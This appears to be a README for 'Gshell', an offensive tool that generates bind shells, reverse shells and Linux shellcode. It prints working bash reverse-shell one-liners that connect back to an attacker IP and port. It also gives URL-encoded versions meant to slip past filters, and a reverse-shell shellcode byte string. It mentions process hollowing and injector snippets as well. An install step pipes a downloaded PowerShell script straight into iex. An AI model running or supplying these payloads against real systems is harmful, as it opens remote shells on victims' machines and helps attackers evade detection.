Gshell is a simple yet flexible cross-platform shell generator tool. A cross-platform shell generator tool that lets you generate whichever shell you want, in any system you want, giving you full control and automation.
Is cross-platform, you can use it in operating systems such as:
- Unix-based systems
- GNU/Linux
- Windows
- macOS
Generates the following shells:
- Bind Shells: The target has a listening port and we connect to the target.
- Reverse Shells: We have a listening port and the target connects to us.
Supports the following encodings (as of now):
- URL Encoding: Bypass URL filters
- Base64/32/16 Encodings: Bypass string/keyword filters
- PowerShell Base64 Encoding
Supports the follow IP versions:
- IPv4
- IPv6
Supported protocols:
- TCP
- UDP
- ICMP
Note: You can add your own shells that use other protocols such as DNS.
Supports the following languages and tools:
- PowerShell
- Python
- Bash
- Sh
- Perl
- Socat
- Netcat
- Nc
- Awk
- Lua
- NodeJS
- OpenSSL
- PHP
- Ruby
- Telnet
- Golang
- C#
- Dart
- Groovy
- Many more…
It is limitless, feel free to add as many as you desire!
The shells are stored in markdown files as it makes it easy for everyone.
You can add more bind shells by adding markdown code blocks the following file:
shells/bind_shells.md
You can also add more reverse shells by adding markdown code blocks the following file:
shells/reverse_shells.md
These can be one-liners and multi-liners, it doesn’t matter. You can even add C# multi-liners code blocks if you want.
Here is a reverse shell example command:
bash -i >& /dev/tcp/192.168.10.11/433 0>&1
To add another shell simply replace the IP address and the port placeholders or variables values with these placeholders in your code or command:
$ip
: IP address$port
: Port number
Here is an example:
bash -i >& /dev/tcp/$ip/$port 0>&1
Overview
This is the help menu:
PS C:\gshell> python gshell.py -h
usage: gshell.py [-i ] [-p ] [-s ] [-r] [-b] [–hollowing] [–injector] [–shellcode] [–srev] [–sbind] [–linux] [–base64] [–base32] [–base16] [–url]
[–no-block] [-l] [-a] [-h]
██████ ███████ ██ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██
██ ███ ███████ ███████ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██████ ███████ ██ ██ ███████ ███████ ███████
Generate shellcodes, bind shells and/or reverse shells with style
Version: 1.2
Author: nozerobit
Twitter: @nozerobit
Options:
-i , –ip
Specify the IP address
-p , –port
Specify the port number
-s , –shell
Specify a shell type (python, nc, bash, etc)
Payload Types:
-r, –reverse Victim communicates back to the attacking machine
-b, –bind Open up a listener on the victim machine
Snippets Types:
–hollowing Print process hollowing code snippets
–injector Print process injector code snippets
Shellcode Required Options:
–shellcode Generate shellcodes, requires –srev or –sbind and –linux
–srev Reverse shell shellcode
–sbind Bind shell shellcode
–linux Linux shellcode
Encoding Options:
–base64 Add base64 encoding
–base32 Add base32 encoding
–base16 Add base16 encoding
–url Add URL encoding
Markdown Options:
–no-block Skip code blocks
while parsing
Help Options:
-l, –list List the available shell types
-a, –advice Print advice and tips to get connections
-h, –help Show this help message and exit
Example of Listeners and Connectors
Connect with nc TCP:
nc -v
Connect with nc UDP:
nc -vu IP PORT
Example of Bind Shells & Reverse Shells
Example, generate bash reverse shells:
PS C:\gshell> python .\gshell.py -i 192.168.111.120 -p 443 -r -s bash
[+] The IPv4 address: 192.168.111.120 is valid.
[+] The port number: 443 is valid.
[+] Shell type is valid
[+] Preparing reverse shells
[+] Generating bash shells
bash -i >& /dev/tcp/192.168.111.120/443 0>&1
—————-NEXT CODE BLOCK—————-
0<&196;exec 196<>/dev/tcp/192.168.111.120/443; sh <&196 >&196 2>&196
—————-NEXT CODE BLOCK—————-
/bin/bash -l > /dev/tcp/192.168.111.120/443 0<&1 2>&1
—————-NEXT CODE BLOCK—————-
bash -i >& /dev/tcp/192.168.111.120/443 0>&1
—————-NEXT CODE BLOCK—————-
bash -i >& /dev/udp/192.168.111.120/443 0>&1
Example of Encodings
Here is an example of an encoding:
PS C:\gshell> python .\gshell.py -i 192.168.111.120 -p 443 -r -s bash –url
[+] The IPv4 address: 192.168.111.120 is valid.
[+] The port number: 443 is valid.
[+] Shell type is valid
[+] Preparing reverse shells
[+] Generating bash shells
[+] Adding URL Encoding
bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.111.120%2F443+0%3E%261%0A
—————-NEXT CODE BLOCK—————-
0%3C%26196%3Bexec+196%3C%3E%2Fdev%2Ftcp%2F192.168.111.120%2F443%3B+sh+%3C%26196+%3E%26196+2%3E%26196%0A
—————-NEXT CODE BLOCK—————-
%2Fbin%2Fbash+-l+%3E+%2Fdev%2Ftcp%2F192.168.111.120%2F443+0%3C%261+2%3E%261%0A
—————-NEXT CODE BLOCK—————-
bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.111.120%2F443+0%3E%261%0A
—————-NEXT CODE BLOCK—————-
bash+-i+%3E%26+%2Fdev%2Fudp%2F192.168.111.120%2F443+0%3E%261
—————-NEXT CODE BLOCK—————-
Example of Shellcodes
Here is an example of a shellcode:
PS C:\gshell> python .\gshell.py -i 192.168.220.131 -p 4433 –shellcode –srev –linux
[+] The IPv4 address: 192.168.220.131 is valid.
[+] The port number: 4433 is valid.
[+] Generating reverse shell shellcodes
[+] Generating Linux shellcodes
\x89\xe5\x31\xc0\x31\xc9\x31\xd2\x50\x50\xb8\x1\x1\x1\x1\xbb\xc1\xa9\xdd\x82\x31\xc3\x53\x66\x68\x11\x51\x66\x6a\x02\x31\xc0\x31\xdb\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x66\xb8\x6a\x01\x89\xe1\x89\xea\x29\xe2\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
Installation in Linux
Clone or download the repository:
git clone https://github.com/nozerobit/gshell
Install the requirements:
python3 -m pip install -r gshell/requirements.txt
Installation in Windows
Clone or download the repository:
git clone https://github.com/nozerobit/gshell C:\Tools
Install chocolatey with CMD as Administrator:
@powershell -NoProfile -ExecutionPolicy Bypass -Command “iex ((new-object net.webclient).DownloadString(‘https://chocolatey.org/install.ps1’))” && SET PATH=%PATH%;%ALLUSERSPROFILE%\chocolatey\bin